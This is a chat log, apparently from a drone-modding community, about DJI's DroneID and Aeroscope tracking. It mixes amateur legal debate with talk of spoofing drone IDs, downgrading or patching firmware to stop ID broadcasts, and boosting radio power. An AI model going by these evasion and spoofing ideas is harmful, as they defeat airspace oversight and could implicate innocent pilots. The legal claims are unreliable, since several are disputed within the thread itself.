Strong feelings and rational arguments such as yours are quite welcome.
[2019-10-06 20:40:46]
nocommie :
To be clear, the statement was that if an officer gets ANY call for service about a drone, regardless if there was any violation they were to get all that info. My response was what if the pilot responds "Am I being detained? If so, for the investigation of what crime?" Then, assuming no crime, and they refuse to provide any of that info what are you going to do? Just because "someone" calls in and "complains" about a drone, doesn't mean it is automatically a violation of law and you can be detained, searched.
[2019-10-06 20:42:08]
nocommie :
My concern is that aeroscope etc is going to be running all the time and this "expert" will dispatch patrol officers to get this info from operators with no justification. To start, he is telling them incorrect info about what authority they have.
[2019-10-06 20:42:22]
bobdole :
I'm more worried about the interruption while piloting.
[2019-10-06 20:44:48]
bobdole :
if a cop is called out about someone harassing a wild animal that is protected, that cop can't really do anything about it. I imagine it would be the same with a pilot unless lives were in danger
[2019-10-06 20:47:05]
nocommie :
The problem is that this expert and many in law enforcement don't know the rules and are making incorrect assumptions. As an example, someone flying a drone legally can be detained, forced to provide S# etc. and can be detained for "trespassing" for flying a drone in the NAS (TFR violation or not). All this info was given to a 3rd party and relayed to me. I gave them some counter questions to ask (I have a LE background) and the "expert" had to change his stance on what he said when certain things were pointed out. The problem is, this "expert" is advising all patrol officers of what they should do when dealing with drone operators.
[2019-10-06 20:49:27]
nocommie :
I fly legally and I will be DAMNED if I will allow an LEO to treat me like a criminal when I am flying legally. Actually, let them do it and then write a check later. It's just time to ditch DJI with all their nanny BS and broadcasting to the world my personal info.
[2019-10-06 20:52:27]
nocommie :
Another area I want to research is if wiretapping laws prevent getting my info via aeroscope etc. It is an encrypted comms between me and the aircraft. I am not agreeing for anyone to intercept it. Maybe it is in the DJI EULA that says I agree to allow them to broadcast it. If not, evidence of a crime, warrant or court order is needed for LE to intercept the info from my craft without my permission.
[2019-10-06 22:10:45]
cantrepeat :
@nocommie "If not, evidence of a crime, warrant or court order is needed for LE to intercept the info from my craft without my permission." exactly!! With PC or a warrant stopping someone for a legal activity is in fact illegal. Hacking into your drone, which is basically a flying computer is against the law without a warrant unless you are engaged in illegal activity and even then it's still suspect.
[2019-10-06 22:21:10]
validat0r :
Droneid Isn’t encrypted
[2019-10-06 22:48:42]
nocommie :
Ah ok, not encrypted. Still, that doesn't change the fact that it is still wiretapping. I remember when the old cellphone comms could be picked up on a regular scanner. It was still illegal to intercept it without one party's consent.
[2019-10-07 00:32:46]
dkovar :
It is intentionally broadcast with the intent of being received. There is nothing illegal about two devices made by the same company communicating with each other.
[2019-10-07 00:47:31]
nocommie :
I understand what you are saying but don't agree that it is legal. The manufacturer does not have the right to broadcast your info without a regulatory requirement or your consent. There is no law about drone ID (yet). Now if the EULA has something about it that is different. Then you have to look at an EULA for each FW update. EX: my MP1 EULA prob didn't have it but maybe a later FW where they enabled drone ID does? Suffice to say this is all emerging tech and a whole new area of law to figure out. Can't really compare it to anything else (motor vehicles etc) because it was unregulated until 107. If 107 doesn't address something, like drone ID, there is no compelling regulatory requirement for what DJI is doing.
[2019-10-07 00:51:54]
nocommie :
So for example if huawei enabled the broadcast of your location or text message content etc and said it was "intentional" does that make it "legal"? Maybe it is in the fine print of the EULA but you have no way to turn that off. Does using the device automatically imply consent?
[2019-10-07 00:57:38]
cantrepeat :
Without a law in place then you should be able to opt-out of any of your information being gathered or broadcast.
[2019-10-07 01:04:03]
dkovar :
You can opt out by not buying the device. It's been awhile since I paid attention while activating a DJI product but I am fairly certain that you agree to sharing certain information that is going into the ID when you activate the product.
[2019-10-07 01:07:20]
nocommie :
Agreed, you can decide NOT to buy it IF it is in the EULA. But, how could it be in an EULA on a device where it was not capable until a later FW? That's my point, maybe a later FW has the EULA that specifies it? But, looking at the bigger picture, an EULA etc does not trump regulations, statutes, local/state/fed law.
[2019-10-07 01:08:00]
nocommie :
Just because it is in a contract doesn't mean it can violate law.
[2019-10-08 01:48:01]
bjoneseying :
Can aeroscope intercept the signal if operating on 2.3/2.5Ghz?
[2019-10-08 02:46:50]
brett.e.burkhart :
Dumb American here but wouldn’t this fall under GDPR for our European friends? If personally identifiable information is being transmitted to a 3rd party paying the manufacturer for this information without the “willful consent” of the user by a tech company that seems like GDPR territory.
Aeroscope claims to be able to pick up drones 50 km away. This means that it will be picking up data from drones that are operating perfectly legally. Any Aeroscope user could use this to collect and process data of users without any oversight whatsoever.
I think a GDPR complaint from one of you Europeans would do some good as DJI is clearly in violation of GDPR when it has you agree to EULA because it cannot be revoked and there is no way to use DJI’s software without agreeing to it.
Art. 7 GDPR Conditions for consent
Sections 3-4
“The data subject shall have the right to withdraw his or her consent at any time.
The withdrawal of consent shall not affect the lawfulness of processing based on consent before its withdrawal. Prior to giving consent, the data subject shall be informed thereof. It shall be as easy to withdraw as to give consent.
When assessing whether consent is freely given, utmost account shall be taken of whether, inter alia, the performance of a contract, including the provision of a service, is conditional on consent to the processing of personal data that is not necessary for the performance of that contract.”
[2019-10-08 02:51:48]
brett.e.burkhart :
And that’s a small piece of the pie. It seems DJI violates GDPR in every way imaginable
[2019-10-08 09:52:00]
dkovar :
It is not being intercepted. It is being broadcast and received by devices made by the same manufacturer specifically to exchange this information.
Their users are informed, though it is buried in legalese. This has been the way of informing users for decades.
[2019-10-08 12:09:03]
cantrepeat :
I believe the part of show your license is for part 103 commercial use of drones.
[2019-10-08 12:09:17]
cantrepeat :
doesn't apply to hobbyist
[2019-10-08 12:10:50]
cantrepeat :
or is it part 107?
[2019-10-08 12:11:52]
cantrepeat :
yeah part 107 commercial test
[2019-10-09 04:12:56]
brett.e.burkhart :
The FAA is treating the “Exception for limited recreational operations of unmanned aircraft (49 U.S.C. 44809)” as a “waiver” from the 107 requirements. This is the actual waiver document from the FAA <https://www.faa.gov/uas/recreational_fliers/new_changes_recreational_uas/media/44809_authorization.pdf>
It says in part:
1. A copy of the application made for this certificate shall be attached and become a part hereof.
2. This certificate shall be presented for inspection upon the request of any authorized representative of the Federal Aviation Administration, or of any State or municipal official charged with the duty of enforcing local laws or regulations.
3. The holder of this certificate shall be responsible for the strict observance of the terms and provisions contained herein.
4. This certificate is nontransferable.
To fly under the Exception for limited recreational operations of unmanned aircraft (49 U.S.C. 44809) you must adhere to the provisions of this document or you cease to be considered operating under the “exception for limited recreational operations of unmanned aircraft” and therefore must have a Remote Pilot Certificate (aka part 107 license)
It’s a bunch of government bullshit that’s what it is. You must have your registration with you at all times in paper or electronic form and produce it for LE when asked.
[2019-10-09 09:37:42]
cantrepeat :
There was already one case tossed out of court over this recreational use.
[2019-10-09 09:40:47]
cantrepeat :
Section 336 applies to recreational use of drones over 55 pounds, meaning tiny toys are not affected. For those operating heavier drones for fun, pilots will need to pass an aeronautical exam and safety test administered by the FAA. However, as Brice notes, the rule was passed last fall and the test has not been made public yet.
[2019-10-09 09:41:44]
cantrepeat :
updated 2019 article about drone laws <http://www.abajournal.com/news/article/want-to-fly-a-drone-you-have-to-play-by-the-rules>
[2019-10-09 09:42:52]
cantrepeat :
<https://jrupprechtlaw.com/drone-laws/>
[2019-10-09 09:43:04]
cantrepeat :
Some of the stuff was even rolled back
[2019-10-09 09:47:53]
cantrepeat :
That waiver is not needed to fly as a hobbyist either.
[2019-10-09 09:50:53]
cantrepeat :
That is a waiver for recreational flying in a controlled air space.
[2019-10-09 09:53:18]
cantrepeat :
<https://www.faa.gov/uas/commercial_operators/part_107_waivers/waivers_issued/media/2016-ATO-P107-00219_signed.pdf>
[2019-10-09 10:36:34]
dkovar :
Valid and interesting question.
[2019-10-09 10:41:41]
dkovar :
Very valid question.
[2019-10-09 11:02:52]
cantrepeat :
You must fly in Class G airspace. If you need to fly in Class B, C, D or E controlled airspace, you need to apply for airspace authorization. Check out our LAANC authorization guide to better understand how that authorization process works.
[2019-10-09 13:46:26]
the_lord :
I don't see anything related to AeroScope on their site
[2019-10-09 14:14:49]
the_lord :
yes, just tested it on both 2.3/2.5
[2019-10-09 15:14:58]
bobdole :
from that drone law page "For example, I was reading a drone book, by someone very popular on the internet and Youtube, which was just completely – flat out – totally- 100% wrong. The section on drone laws was just horrible. I think this person just hired a copywriter to write the book which resulted in utter garbage. If you were to rely on that bad advice, you could get in trouble and be on the receiving end of a lawsuit or criminal prosecution. Worse yet, on their Youtube channel, they continued to give out legal advice that was incomplete. " I bet he's talking about tony northrup
[2019-10-09 15:15:05]
bobdole :
that guy is full of erroneous information
[2019-10-09 15:20:09]
cantrepeat :
I was thinking of that other internet/youtube guy that thinks he's the end all be all of drone regs and shit.
[2019-10-09 15:21:24]
cantrepeat :
the Ken Heron idiot
[2019-10-09 15:25:13]
cantrepeat :
If so, regardless, you don't need a waiver to fly as a hobbyist in non-regulated air space.
[2019-10-09 15:31:11]
brett.e.burkhart :
You already have one per the link above. That’s the “authorization” to fly for pilots that meet the criteria. This is in lieu of an Airman Certificate which is what is normally required to fly in the National Airspace.
[2019-10-09 15:33:13]
cantrepeat :
At fixed sites (commonly referred to as flying fields)
[2019-10-09 15:33:47]
cantrepeat :
I can't wait until there are personal sales background checks for toys.
[2019-10-09 15:37:35]
brett.e.burkhart :
That’s one of the ways rec pilots can fly in controlled airspace without a LAANC Authorization or COA since it’s listed in that waiver. An example of a “fixed site” is an AMA field which has registered and been approved to be a “fixed site” with the FAA. Even though an AMA field might be in controlled airspace pilots there do not each need their own COA because of this specific provision
[2019-10-09 15:41:01]
cantrepeat :
All this in the name of anti terrorism, last I checked it wasn't a mavic that was flown into the world trade center towers.
[2019-10-09 15:50:15]
brett.e.burkhart :
Again I’m not disagreeing with your overall sentiment, I actually totally agree it’s ridiculous. I just wanted to set the record straight so we don’t get anybody in trouble for refusing to provide documents they are required to provide.
I’m down for working on getting droneID disabled but we really need a way to be able to test it.
We know the remote doesn’t have GPS so does it just use the home point for the operators location or does it use the device’s GPS location? What happens if the home point is updated or the devices GPS location is faked?
I know it can also triangulate the RF signal back to the operator but I don’t know that we can stop that.
[2019-10-09 15:52:59]
the_lord :
if they are using RF detectors other than AeroScope, there is no way to escape
[2019-10-09 15:54:27]
cantrepeat :
I still don't believe that you need a waiver to fly in non-regulated air space. As I see it, register the drone, don't fly in regulated air space, don't go above 400 and maintain LOS and you meet the requirements by law.
[2019-10-09 15:55:02]
cantrepeat :
I'm not going to request a waiver to fly around in my backyard 12 miles from a small airport.
[2019-10-09 15:55:32]
cantrepeat :
and give right of way to any manned aircraft at any location.
[2019-10-09 15:55:36]
cantrepeat :
end of line
[2019-10-09 16:34:53]
brett.e.burkhart :
You don’t need a new waiver. You already have it. The FAA has granted that waiver to all pilots meeting the conditions specified in the waiver. You don’t have to do anything more as long as you follow the rules of that waiver which you have already been granted.
I pulled that up so you could see that having the registration handy and making it available to LE upon request is a requirement to fly under the “Exception for limited recreational operations of unmanned aircraft (49 U.S.C 44809)” otherwise you need an Airman Certificate which also has a requirement to be provided to LE upon request. They got ya coming and going.
My point was you can’t refuse to give your registration to LE just because they don’t have reasonable suspicion which btw is already a pretty low bar
[2019-10-09 16:53:28]
brett.e.burkhart :
@catalinaskirace he’s a better resource for those recreational requirements. Same info but more explicit on what it is and easier to read
<https://www.faa.gov/documentLibrary/media/Advisory_Circular/AC_91-57B.pdf>
[2019-10-09 17:02:53]
quad808 :
Thanks guys, now I am totally confused...
[2019-10-09 17:06:49]
quad808 :
So....you are in the US, flying a drone. Local LE comes up to you and starts asking you questions about who you are, what you are doing etc. Do you: 1. exercise your 5th amendment rights and don't give them anything 2. refuse to answer any questions unless they tell you why you are being questioned, and if you broke any laws, since they are not FAA 3. show them whatever you guys talked about above, which they will not understand anyway 4. beg for forgiveness 5. sell all your drone stuff and get out of town
[2019-10-09 17:07:31]
bobdole :
land the drone onto yourself and the cop (at 15mph descent) and then sue the city
[2019-10-09 17:07:43]
bobdole :
PROFIT
[2019-10-09 17:07:53]
quad808 :
OMG...I just spit up....HAHAHAHAHHA
[2019-10-09 17:08:28]
quad808 :
Thats what I get for eating and typing....bwahahahahaha
[2019-10-09 17:09:24]
quad808 :
Hey....I watch "Cops" and know what idiots reveal to cops when they are fishing.... I D I O T S
[2019-10-09 17:09:26]
bobdole :
I got approached by Jehovah's Witnesses once while piloting a mavic air and oh man I was shocked at how much of a dangerous distraction that was. you can't have a half pound thing hundreds of feet in the air with exposed spinning blades just left to do whatever it wants
[2019-10-09 17:10:49]
bobdole :
the cop will essentially have to ask you to land the drone or wait until you land it. when he goes that far, he's gotta fabricate a reason to do so and that is what makes me uncomfortable.
[2019-10-09 17:11:49]
quad808 :
totally agree....I am a reasonable guy and have LE in the family, but do realize that there is a lot of attitude in LE by many
[2019-10-09 18:06:34]
cantrepeat :
I read that PDF, if you are flying in class G non regulated air space then you just need to follow the stuff I said, LOS, 400' AGL, give way to manned aircraft. You don't need to ask for authorization or get a waiver to fly.
[2019-10-09 18:07:57]
cantrepeat :
I'm going to print that PDF and take it with me when I fly. That way, if a LEO asks for stuff I can just highlight the class G and pull up flightaware and show it's non-regulated air space and tell them to piss off.
[2019-10-09 18:24:13]
cantrepeat :
well damn, it looks like there will be a required knowledge and safety test coming out. Some time within the next six months it says.
[2019-10-09 18:24:57]
cantrepeat :
So it's going to be like operating a motor vehicle, you don't need to violate a law in order for a LEO to ask for your DL.
[2019-10-09 18:25:16]
cantrepeat :
<https://www.faa.gov/uas/recreational_fliers/>
[2019-10-09 19:09:27]
quad808 :
I would like to make my own community based organization. Member: one. Membership closed.
[2019-10-09 19:10:31]
quad808 :
Wait. Let me change that. Membership open to all with a $1000 registration fee. One time, life membership. (I need to pay for my drones somehow)
[2019-10-09 19:11:42]
brett.e.burkhart :
That’s what I do!
[2019-10-09 19:17:26]
cantrepeat :
I dunno, it says something in there about needing to articulate what safety guidelines you are following, if asked by an FAA official.
[2019-10-10 03:52:24]
brett.e.burkhart :
You are right! Follow the PDF not what I say
[2019-10-10 09:29:43]
cantrepeat :
It's just asinine how this is getting. You don't have to explain the laws to a traffic cop when you get stopped.
[2019-10-10 12:27:22]
nocommie :
Maybe not but the screenshots/reports had the name aeroscope in it.
[2019-10-15 21:24:01]
coldflake :
Aeroscope hack is coming out with NLD V2 to protect our Chinese users from governmental abuse
[2019-10-26 14:52:54]
boris.plintovic :
<https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>
[2019-10-26 15:49:16]
cantrepeat :
I don't know how I feel about this feature - copy and rebroadcast someone else's valid ID?
[2019-10-26 15:50:27]
cantrepeat :
It's like SWATting someone
[2019-10-26 15:50:32]
cantrepeat :
or could be
[2019-10-26 16:20:26]
boris.plintovic :
I was able to upload the program to ESP but I don't know how to set it up
[2019-10-26 19:49:38]
bobdole :
it's going to work like this... guy flies drone like a douchebag where aeroscope is being used and sticks out like a sore thumb. he repeats and they figure out he's using a spoofer. they look for ip addresses that downloaded said spoofer and kick his door 3 hrs later
[2019-10-26 20:41:30]
dkovar :
... and kick in the door of the local Starbucks.
[2019-10-27 10:17:49]
cantrepeat :
There isn't a legal requirement to transmit an ID, yet.
[2019-10-27 10:39:19]
dkovar :
Or anything illegal about transmitting a false ID that I can think of, though I am sure someone could get creative.
[2019-10-27 10:53:32]
cantrepeat :
what's the federal code about hacking that pretty much allows them to encompass anything they want?
[2019-10-27 10:54:23]
cantrepeat :
I don't want to google it, FBI might come to my house!! :smile:
[2019-10-27 13:47:17]
bobdole :
no requirement, but this makes me think scenarios where someone would want to spoof a droneid (short of trolling at a demonstration which i highly encourage) would most likely involve something illegal and very high profile
[2019-10-27 14:19:18]
nocommie :
so how about spoofing the dji info from one of the local law enforcement drones? lol
[2019-10-27 15:08:05]
bobdole :
i like that one
[2019-10-28 01:08:14]
mutantroar :
@boris.plintovic That throwie "example" is just that...an example of how you "might" broadcast a sample droneID packet. Although it will function "as-is," it is not meant to. It is very stripped down and requires you knowing the format of the drone ID packet as well as a little bit about WiFi packets in general. It just creates a single sample packet of hard coded data (SSID, telemetry, etc) and broadcasts it every second. You'll need to spend some time studying a little packet "anatomy" to really make sense of it or be of any use to you. I would also suggest capturing real packets yourself and analyzing them to get a better understanding of how they occur in the wild. If you do that, the throwie code will be significantly more clear to you.
[2019-10-28 01:14:19]
mutantroar :
(Line 45 in the throwie is where the meat of the drone id packet is)
[2019-10-28 06:49:01]
boris.plintovic :
the program also had a small error in line 11: not 128 but 270. After uploading to the ESP I turned on a wifi sniffer and it displays a new wifi ABCDEFG
[2019-11-01 11:08:24]
the_lord :
AeroScope detected the Mavic mini and reported it as newdrone_53
[2019-11-01 14:00:52]
mutantroar :
Is 53 the value that is coming through on the product_type field of the DroneID?
[2019-11-02 01:51:02]
the_lord :
I don't know
[2019-11-03 21:10:19]
pingspike :
trying to find out when droneid was introduced to the Mavic Pro range, did it get built in to a certain firmware version ? can't find any details on the wiki
[2019-11-03 23:20:10]
quad808 :
I believe it was 01.03.0800
[2019-11-03 23:20:38]
quad808 :
which is another reason why 01.03.0700 firmware is so popular.
[2019-11-04 09:22:24]
pingspike :
thanks @quad808 thankfully I'm still rocking `.700` :+1:
[2019-11-04 17:40:29]
kyokushin :
Hi there, any eta? Work on defeating droneid is cancelled or still fighting?
[2019-11-13 23:44:02]
chipmangini :
<https://www.theverge.com/2019/11/13/20963702/dji-drone-remote-identification-smartphone-app?fbclid=IwAR1Vojc0SSv5cYDC_Z-5P9MGEHTmrE2USLCcUFTgOAgvqE5se9UjgX4WZ7A>
[2019-11-14 02:13:02]
nocommie :
what could possibly go wrong... FFS
[2019-11-14 03:24:56]
digdat0 :
wonder how long until the first lawsuit in the US against it
[2019-11-14 06:29:23]
pingspike :
:pensive:
[2019-11-14 07:08:20]
ki4gyw :
Wonder if NLD will actually release what they have been sitting on to counter this. I see a need for ID but not for everyone to launch an app and gather all the data.
[2019-11-14 07:10:52]
ki4gyw :
your data is not our business, it's everyone's.
[2019-11-14 14:05:49]
peteair :
hello ! I get back to that ages old message :slightly_smiling_face:. Just out of curiosity : how did you find symbols for those firmware ? Some are clearly seen by doing a "strings" on the bin file (eg. "Rfmodulerr" for 1400.bin firmware) but for others (like "ofdm_init_instruction") how did you do ?
[2019-11-14 14:06:19]
peteair :
Is it done manually by analyzing the code or did you have another source of information ?
[2019-11-14 15:21:05]
peteair :
that's really good work thx :+1: ! I'm still curious about how data are sent and received to/from the FPGA. Am I right to assume that this will transit through that uC ? Do you know if it would be the final decoded/decrypted message (0x55....) or raw demodulated bytes from the FPGA ?
[2019-11-14 17:04:59]
peteair :
yes I guess they've made Artosyn build a chip based on their VHDL design for the FPGA...
[2019-11-14 17:07:33]
peteair :
my interrogation was more about the amount of work done by the FPGA: if it's only OFDM modulation we have a chance to reverse it, if it also includes packet framing, encryption etc... we're probably out of luck....because the fpga bitstream is encrypted (and even if it was not, I'm not sure we could reverse the bitstream to RTL and understand what happens)
[2019-11-14 17:38:18]
mefisto :
Second half of the m1900 fw in P3X is empty (filled with 255), the other half starts with some sparse data, then goes into something random - possibly encrypted, but I didn't try to dive into Altera's bitstream format deep enough to confirm that. So you confirmed it's some kind of encryption?
[2019-11-14 22:38:17]
chipmangini :
More info from DJI <https://www.dji.com/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification?fbclid=IwAR2uD96inJ4X8lh3gVXQEs6TOcoZ6oWbWo39lgMDIt8fta9HszT4xh3Lt1A>
[2019-11-14 22:43:55]
quad808 :
Wow! How are they going to get their phones so close to a drone flying at 400ft? pffffft!:stuck_out_tongue_closed_eyes:
[2019-11-14 23:40:32]
dkovar :
Bluetooth can go 400ft, easy.
[2019-11-15 04:11:54]
bjoneseying :
Fly higher :smile:
[2019-11-15 06:27:44]
pingspike :
Would this work on “older” hardware / firmware like the Inspire 1 and older Phantoms?
[2019-11-15 12:03:49]
dkovar :
"Wi-Fi based solution to remotely identify airborne drones" Should just be a firmware update. It's just their existing Aeroscope modified to be received by other devices.
[2019-11-15 14:55:36]
pingspike :
but this was all designed after the shift from oldskool to modern (for want of a better description) firmware types?
[2019-11-15 16:19:20]
peteair :
@mefisto: you can check entropy with binwalk and it's around 100% + I've compared to known clear and encrypted bitstream. Moreover, even if the format is proprietary, the header has some distinct features.....so yes I'm pretty certain that their bitstream is encrypted unfortunately
[2019-11-16 20:35:11]
boris.plintovic :
Maybe FlightController.rb by @jan2642 is the right way.
<https://github.com/jan2642/DUMLrub>
[2019-11-17 10:45:13]
oakley75 :
I assume it's not enough to force encryption on our WiFi transmission (ala P2V+ days) to stop this silly app? Aeroscope a different ball game obviously.
[2019-11-18 11:51:19]
eitan1195 :
any idea how to receive the lightbridge packets? It appears to be a sort of wimax, but can't seem to receive it using gnuradio
[2019-11-18 13:09:49]
peteair :
interesting ! why do you compare them to wimax ?
[2019-11-18 13:10:01]
eitan1195 :
It is documented in a few places.
[2019-11-18 13:10:18]
peteair :
just because it's ofdm or because of other features ?
[2019-11-18 13:13:27]
eitan1195 :
based on documentation of commercial companies.
[2019-11-18 13:56:02]
peteair :
nice ! would you happen to have some link to share ?
[2019-11-19 17:25:37]
zwontzov.da :
@pierreduf <https://diydrones.com/m/blogpost?id=705844%3ABlogPost%3A2291366>
[2019-11-20 07:12:01]
eitan1195 :
the issue is the lack of a proper wimax gnuradio chain, and the wimax intel cards are rubbish
[2019-11-20 17:40:46]
zwontzov.da :
@eitan1195 and what about droneid for Aeroscope in Lightbridge? Is it a special burst in the common video channel or a separate physical channel?
[2019-11-21 02:31:34]
nocommie :
<https://youtu.be/EdRvaTlKJIA>
[2019-11-21 03:11:50]
bobdole :
that video never gets old
[2019-11-21 06:19:20]
boris.plintovic :
A week of work culminating in success.
DJI Spark
FW 1.00.0900
Applied FC_Patcher (305, 306 modules)
applied forceFCC + Boost
All I have to do is test flight
[2019-11-21 07:15:00]
eitan1195 :
No clue. the entire transmission is wimax, it probably passes as the equivalent to beacons in wimax. we really need a gnuradio chain for that.
[2019-11-21 10:02:16]
pingspike :
Nice!
[2019-11-28 19:34:10]
pingspike :
does the new DJI FPV gear broadcast droneid data? :thinking_face:
[2019-11-28 22:14:55]
the_lord :
I don't think so as there are no GPS coordinates, I can test tomorrow :slightly_smiling_face:
[2019-11-29 09:31:11]
pingspike :
good point
[2019-11-29 11:24:34]
the_lord :
as expected AeroScope didn't see the FPV system
[2019-11-30 11:57:31]
zwontzov.da :
<https://dl.djicdn.com/downloads/Mavic_2_Enterprise/20190917/Mavic_2_Enterprise_Series_Release_Notes_EN.pdf>
[2019-11-30 11:59:01]
zwontzov.da :
Date: 2019.09.02
Mavic 2 Enterprise Aircraft Firmware: v01.01.0400
AES-256 transmission encryption
The encryption was added in September. Does Mavic Pro 2 use Ocusync encryption? I think no. Only Enterprise series uses it.
[2019-11-30 12:01:30]
zwontzov.da :
@the_lord What do you think about Mavic's encryption? Does Aeroscope receive telemetry from upgraded Mavic 2 Enterprise and Matrice 200 Series?
[2019-12-01 11:51:49]
the_lord :
all DJI drones will be detected regardless of their protocol or encryption
[2019-12-01 15:02:15]
zwontzov.da :
@the_lord Does Aeroscope update by internet from its own application? So we can't download firmware in a browser and update the complex by USB.
<https://forum.dji.com/forum.php?mod=redirect&goto=findpost&ptid=166229&pid=1699146>
and then
I have the latest version using Assistant2 for Aeroscope: v03.00.0014. The Mavic 2 Enterprise is still detected as NewDrone_51, so this will not solve your problem.
If DJI turn on AES encryption they must pass the AES key to Aeroscope. Am I right?
[2019-12-01 15:44:16]
jcase :
@zwontzov.da where does one find those release note PDFs
[2019-12-01 15:44:23]
the_lord :
@zwontzov.da no it doesn't update from internet, if you read the post you mentioned, it updates the CS application using downloaded bin file
what do you mean by "download firmware in browser and update complex by USB"
there is no relation between drone communication protocol and AeroScope, even if the drone is using AES encryption the AeroScope will detect it
[2019-12-01 15:44:47]
jcase :
DroneID beacons are not AES encrypted
[2019-12-01 15:45:04]
jcase :
aeroscope cannot read the OC stream, just the beacons
[2019-12-01 16:28:24]
dkovar :
Does anyone have a packet descriptor for a DroneID beacon? Records, field lengths, etc?
[2019-12-01 16:42:51]
zwontzov.da :
@jcase here
<https://dl.djicdn.com/downloads/dji_assistant/20190314/DJI+Assistant+2+For+AeroScope+Release+Notes(V2.0.1).pdf>
[2019-12-01 16:43:07]
jcase :
right but where do you get the pdf links from
[2019-12-01 16:43:14]
jcase :
i'd like to auto pull all the pdfs
[2019-12-01 16:43:19]
jcase :
scrape it
[2019-12-01 16:47:40]
zwontzov.da :
@jcase I found it after reading forum. I searched in Google. I found the page with links one minute ago :)
<https://www.dji.com/downloads/softwares/assistant-dji-2-for-aeroscope>
[2019-12-01 16:47:50]
jcase :
ah
[2019-12-01 16:47:51]
jcase :
thanks
[2019-12-01 16:48:01]
jcase :
yeah I'm after the PDFs for drone firmware updates
[2019-12-01 16:50:51]
zwontzov.da :
@jcase It's very strange that DroneID beacons are not encrypted. Yes, I read about it in other sources. So we can theoretically receive telemetry in DroneID, but telemetry in the OC stream is encrypted :slightly_smiling_face:
Thanks!
[2019-12-01 16:51:17]
jcase :
I wouldn't expect them to be encrypted
[2019-12-01 16:51:22]
jcase :
DJI would love for it to be a standard
[2019-12-01 16:51:29]
jcase :
well when they designed it they did
[2019-12-01 16:56:48]
zwontzov.da :
Is it a test solution for RemoteID? The first design. After that DJI provides a standard for RemoteID through WiFi.
I think that it is the first attempt at a universal protocol design.
[2019-12-01 16:58:41]
zwontzov.da :
And what will OC stream encryption give? Only marketing in this case?
[2019-12-01 17:11:05]
jcase :
protection from some potential attacks
[2019-12-01 17:13:50]
zwontzov.da :
I don't think that downlink channel with video can be used for attacks. Uplink from RC, yes.
[2019-12-01 17:36:05]
jcase :
Sure it can
[2019-12-01 17:36:20]
jcase :
They could see what the drone is interested in
[2019-12-01 18:49:46]
zwontzov.da :
Ok, I agree)
[2019-12-01 21:26:12]
pingspike :
it's a safe bet the Inspire 1 doesn't have a clue what drone id is, right?
[2019-12-02 03:17:20]
jcase :
bet it does
[2019-12-02 05:03:43]
the_lord :
Inspire 1 has drone ID and AeroScope can see it
[2019-12-02 07:49:12]
eitan1195 :
it still would require one to read the ocusync channel at the moment, right? because the droneid is currently sent (when in rc mode) via ocusync on the mavic pro for instance.
[2019-12-02 09:15:05]
pingspike :
interesting - I thought something that old would be safe
[2019-12-02 09:15:07]
pingspike :
clearly not :confused:
[2019-12-04 20:05:26]
flydji :
can mp1 on 1.03.700 be seen by aeroscope?
[2019-12-04 20:48:20]
quad808 :
I don't believe so....it was "turned on" in .0800 firmware. One more reason why DJI hates you downgrading. Throws a monkey wrench in their world domination plans...
[2019-12-04 22:26:59]
boris.plintovic :
Last MP fw without Aeroscope is 1.03.0600
[2019-12-04 22:31:14]
exumpw :
You checked with kismet? If I am not mistaken, the 0600 and 0700 801 module and ath6kl_usb.ko both have the same md5.
[2019-12-04 22:37:06]
exumpw :
Checked checksum again only difference is 400, 805, 907 modules.
[2019-12-04 22:53:06]
boris.plintovic :
yes kismet. then he tried modulemix 0600 and 04.0300 without 801 and it didn't work out well. drone blocked. no rc, no wifi, no usb. dead
[2019-12-05 05:43:55]
exumpw :
I checked using latest kismet from github on Mavic Pro in WiFi mode after starting motors.
04.0300 - Mavic (Broken firmware) DroneID which seems to be blank frame.
<https://github.com/kismetwireless/kismet/blob/d4f62f2d82f788458354a28166399c0b0502c429/phy_uav_drone.cc#L182-L203>
03.0900 - Manufacturer DJI/DroneID Serial Number XXX ID Method DroneID Telemetry Motor 1 Airborne 0 Last Location 0, 0 Home Location 0, undefined Height 0
03.0700, 03.0800 - no DroneID packets captured.
Also according to department13 Anatomy-of-DJI-Drone-ID-Implementation ath6kl_usb.ko md5 3d07a732ac90667c618144f46eb3cee4 has flight_info which seems to be starting from 03.0900.
[2019-12-05 06:55:56]
boris.plintovic :
Broken fw is aeroscope on. If aeroscope is off, kismet writes Fingerprint
[2019-12-05 07:40:41]
exumpw :
Looking at parser code
kismet reports Broken firmware if the DroneID sub command is 0x00 (9 byte, 0x10 = flightreg, 0x11 = flightpurpose).
UAV Fingerprint is compared with mac, ssid from conf/kismet_uav.conf.yaml (although my ssid is ^Mavic-.* not ^Mavic_.*).
[2019-12-05 12:33:43]
boris.plintovic :
I think if Kismet reports ID method: DroneID, the Aeroscope packet is active but we can't read it. ID method: Fingerprint probably means the Aeroscope packet is missing and the drone is detected only from the SSID name
[2019-12-05 14:35:02]
exumpw :
Sounds right. So on 0700 and 0800 firmware I get no DroneID packets and I get only fingerprint (after fixing ssid match from Mavic_ to Mavic-).
Hopefully it is not transmitting DroneID packets over OcuSync as well.
<https://i.imgur.com/ZfdMvqH.png>
[2019-12-05 14:58:08]
jcase :
@exumpw all of the firmwares i obtained transmitted droneid, either on wifi or occusync
[2019-12-05 14:58:32]
jcase :
I have an early prototype aeroscope, so i can actually read them properly
[2019-12-05 15:20:58]
boris.plintovic :
@jcase all of them? Even at 0600? because in a document from Kevin F. it says that 0600 is not.
[2019-12-05 15:31:20]
jcase :
i havent checked 600 but i suspect it does at occusync but i would need to check
[2019-12-05 16:07:44]
boris.plintovic :
shame you don't have Spark. I think I managed to turn Aeroscope off. at least the kismet shows
[2019-12-05 16:08:19]
validat0r :
good work
[2019-12-05 16:59:11]
markusfriedl :
how?
[2019-12-05 17:43:34]
exumpw :
So if all Mavic firmwares (including 0700 and older) have droneid over ocusync then only the WiFi part of droneid was added in 0900 and later (which is at 0801/system/lib/modules/ath6k/ath6kl_usb.ko according to department13).
Does it mean the only way to disable droneid is to reverse and patch the firmware? Even an esp8266 jammer will only work on WiFi.
[2019-12-05 18:10:24]
boris.plintovic :
@jcase can I send you my mod for a test then?
[2019-12-05 18:41:38]
jcase :
No
[2019-12-05 18:41:49]
jcase :
I don't support disabling droneid
[2019-12-05 18:41:59]
jcase :
But yeah, it's easy on wifi ones
[2019-12-05 20:08:25]
kyokushin :
@boris.plintovic , great, could you describe how it is achieved? Of course if you like to share it.
[2019-12-05 20:19:08]
boris.plintovic :
